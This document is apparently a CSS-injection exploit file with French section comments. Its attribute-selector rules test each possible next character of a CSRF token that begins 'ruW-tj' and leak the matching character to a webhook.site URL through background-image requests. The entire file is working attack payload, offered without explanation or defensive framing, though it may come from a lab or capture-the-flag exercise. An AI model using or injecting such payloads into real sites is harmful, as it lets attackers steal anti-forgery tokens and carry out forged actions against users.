/* Minuscules */
input[name=csrf][value^="ruW-tja"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?a); }
input[name=csrf][value^="ruW-tjb"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?b); }
input[name=csrf][value^="ruW-tjc"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?c); }
input[name=csrf][value^="ruW-tjd"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?d); }
input[name=csrf][value^="ruW-tje"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?e); }
input[name=csrf][value^="ruW-tjf"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?f); }
input[name=csrf][value^="ruW-tjg"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?g); }
input[name=csrf][value^="ruW-tjh"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?h); }
input[name=csrf][value^="ruW-tji"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?i); }
input[name=csrf][value^="ruW-tjj"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?j); }
input[name=csrf][value^="ruW-tjk"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?k); }
input[name=csrf][value^="ruW-tjl"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?l); }
input[name=csrf][value^="ruW-tjm"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?m); }
input[name=csrf][value^="ruW-tjn"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?n); }
input[name=csrf][value^="ruW-tjo"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?o); }
input[name=csrf][value^="ruW-tjp"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?p); }
input[name=csrf][value^="ruW-tjq"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?q); }
input[name=csrf][value^="ruW-tjr"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?r); }
input[name=csrf][value^="ruW-tjs"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?s); }
input[name=csrf][value^="ruW-tjt"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?t); }
input[name=csrf][value^="ruW-tju"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?u); }
input[name=csrf][value^="ruW-tjv"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?v); }
input[name=csrf][value^="ruW-tjw"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?w); }
input[name=csrf][value^="ruW-tjx"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?x); }
input[name=csrf][value^="ruW-tjy"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?y); }
input[name=csrf][value^="ruW-tjz"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?z); }

/* Majuscules */
input[name=csrf][value^="ruW-tjA"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?A); }
input[name=csrf][value^="ruW-tjB"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?B); }
input[name=csrf][value^="ruW-tjC"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?C); }
input[name=csrf][value^="ruW-tjD"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?D); }
input[name=csrf][value^="ruW-tjE"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?E); }
input[name=csrf][value^="ruW-tjF"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?F); }
input[name=csrf][value^="ruW-tjG"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?G); }
input[name=csrf][value^="ruW-tjH"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?H); }
input[name=csrf][value^="ruW-tjI"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?I); }
input[name=csrf][value^="ruW-tjJ"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?J); }
input[name=csrf][value^="ruW-tjK"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?K); }
input[name=csrf][value^="ruW-tjL"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?L); }
input[name=csrf][value^="ruW-tjM"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?M); }
input[name=csrf][value^="ruW-tjN"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?N); }
input[name=csrf][value^="ruW-tjO"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?O); }
input[name=csrf][value^="ruW-tjP"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?P); }
input[name=csrf][value^="ruW-tjQ"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?Q); }
input[name=csrf][value^="ruW-tjR"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?R); }
input[name=csrf][value^="ruW-tjS"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?S); }
input[name=csrf][value^="ruW-tjT"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?T); }
input[name=csrf][value^="ruW-tjU"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?U); }
input[name=csrf][value^="ruW-tjV"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?V); }
input[name=csrf][value^="ruW-tjW"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?W); }
input[name=csrf][value^="ruW-tjX"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?X); }
input[name=csrf][value^="ruW-tjY"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?Y); }
input[name=csrf][value^="ruW-tjZ"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?Z); }

/* Chiffres */
input[name=csrf][value^="ruW-tj0"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?0); }
input[name=csrf][value^="ruW-tj1"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?1); }
input[name=csrf][value^="ruW-tj2"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?2); }
input[name=csrf][value^="ruW-tj3"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?3); }
input[name=csrf][value^="ruW-tj4"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?4); }
input[name=csrf][value^="ruW-tj5"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?5); }
input[name=csrf][value^="ruW-tj6"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?6); }
input[name=csrf][value^="ruW-tj7"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?7); }
input[name=csrf][value^="ruW-tj8"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?8); }
input[name=csrf][value^="ruW-tj9"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?9); }

/* Caractères spéciaux */
input[name=csrf][value^="ruW-tj-"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?-); }
input[name=csrf][value^="ruW-tj_"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?_); }
input[name=csrf][value^="ruW-tj."] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?.); }
input[name=csrf][value^="ruW-tj~"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?~); }
input[name=csrf][value^="ruW-tj!"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?!); }
input[name=csrf][value^="ruW-tj@"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?@); }
input[name=csrf][value^="ruW-tj#"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?#); }
input[name=csrf][value^="ruW-tj$"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?$); }
input[name=csrf][value^="ruW-tj%"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?%25); } /* % encodé */
input[name=csrf][value^="ruW-tj^"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?^); }
input[name=csrf][value^="ruW-tj&"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?&); }
input[name=csrf][value^="ruW-tj*"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?*); }
